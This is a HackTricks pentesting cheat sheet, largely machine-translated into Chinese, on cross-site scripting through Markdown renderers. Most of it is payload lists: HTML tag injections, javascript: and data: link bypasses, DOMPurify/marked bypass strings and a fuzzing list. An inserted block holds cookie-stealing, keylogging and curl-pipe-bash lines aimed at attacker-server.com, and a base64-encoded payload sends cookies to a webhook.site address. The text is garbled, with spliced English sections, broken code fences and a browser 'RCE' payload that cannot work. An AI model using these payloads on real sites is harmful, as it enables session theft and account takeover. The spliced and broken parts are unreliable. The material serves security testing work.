hacktricks/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
2023-08-03 19:12:22 +00:00

15 KiB
Raw Blame History

Markdown中的XSS攻击

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

如果你有机会在markdown中注入代码有几种选项可以触发XSS攻击当代码被解释时。

HTML标签

在markdown中触发XSS攻击最常见的方法是注入执行javascript的常见HTML标签因为几个markdown解释器也会接受HTML。

<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />

您可以在hacktricks的主要XSS页面中找到更多示例。

JavaScript链接

如果HTML标签不可用您可以尝试使用markdown语法进行操作

<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))

<!-- Other links attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

Img事件语法滥用

The img tag in HTML allows the inclusion of images in a webpage. However, it also supports an onerror event attribute that can be exploited for cross-site scripting (XSS) attacks.

By injecting malicious code into the onerror attribute, an attacker can execute arbitrary JavaScript code when the image fails to load. This can be used to steal sensitive information, perform phishing attacks, or deface the website.

To exploit this vulnerability, an attacker can craft a URL that includes the payload within the onerror attribute. When the image fails to load, the payload will be executed.

For example, consider the following code:

<img src="https://example.com/image.jpg" onerror="alert('XSS payload')">

In this case, if the image fails to load, the alert function will be executed, displaying the message "XSS payload" to the user.

To prevent this type of attack, it is important to properly validate and sanitize user input, especially when it is used to generate dynamic content on a webpage. Additionally, Content Security Policy (CSP) headers can be implemented to restrict the execution of inline scripts and mitigate the risk of XSS attacks.

![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))

HTML Sanitiser Markdown Bypass

以下代码是对HTML输入进行清理然后将其传递给markdown解析器从而可以通过Markdown和DOMPurify之间的误解来触发XSS。

<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
</script>

负载示例:

# Alert Payload

This payload will display an alert box with the message "XSS Attack".

```html
<script>alert("XSS Attack");</script>

Cookie Theft Payload

This payload will steal the user's cookies and send them to an attacker-controlled server.

<script>document.location='http://attacker-server.com/steal.php?cookie='+document.cookie;</script>

Keylogger Payload

This payload will log all keystrokes made by the user and send them to an attacker-controlled server.

<script>document.onkeydown=function(e){e=e||window.event;var key=e.keyCode||e.which;var char=String.fromCharCode(key);new Image().src='http://attacker-server.com/log.php?k='+char;}</script>

Remote Code Execution Payload

This payload will execute arbitrary code on the victim's machine.

<script>require('child_process').exec('curl http://attacker-server.com/malicious-script.sh | bash');</script>

Phishing Payload

This payload will redirect the user to a phishing page that looks like a legitimate website.

<script>document.location='http://attacker-server.com/phishing-page.html';</script>
```html
<div id="1

![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a

<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#'></p>)
----------------------------------------------
`<p x="`<img src=x onerror=alert(1)>"></p>

Fuzzing模糊测试

Fuzzing模糊测试是一种自动化的测试技术用于发现应用程序中的漏洞。它通过向目标应用程序输入大量的随机、无效或异常数据来测试应用程序的鲁棒性和安全性。Fuzzing模糊测试可以帮助发现各种漏洞包括跨站脚本攻击XSS

在Web应用程序中XSS是一种常见的安全漏洞攻击者可以通过注入恶意脚本来利用该漏洞。为了发现XSS漏洞可以使用Fuzzing模糊测试技术来模拟各种输入情况包括特殊字符、HTML标签和JavaScript代码。通过观察应用程序的响应可以确定是否存在XSS漏洞。

Fuzzing模糊测试是一种强大的工具可以帮助发现应用程序中的安全漏洞。然而它并不能保证找到所有的漏洞因此在进行Fuzzing模糊测试还应该结合其他测试技术和安全最佳实践来提高应用程序的安全性。

<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/哦%20不/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1&#41;)
[a](javascript&#58this;alert(1&#41;)
[a](Javas&#99;ript:alert(1&#41;)
[a](Javas%26%2399;ript:alert(1&#41;)
[a](javascript:alert&#65534;(1&#41;)
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain&#41;)
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
[ ](http://a?p=[[/onclick=alert(0) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
[XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1&#41;)
[XSS](javascript&#58this;alert(1&#41;)
[XSS](Javas&#99;ript:alert(1&#41;)
[XSS](Javas%26%2399;ript:alert(1&#41;)
[XSS](javascript:alert&#65534;(1&#41;)
[XSS](javascript:confirm(1)
[XSS](javascript://www.google.com%0Aprompt(1))
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS](<28>javascript:alert(document.domain&#41;)
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥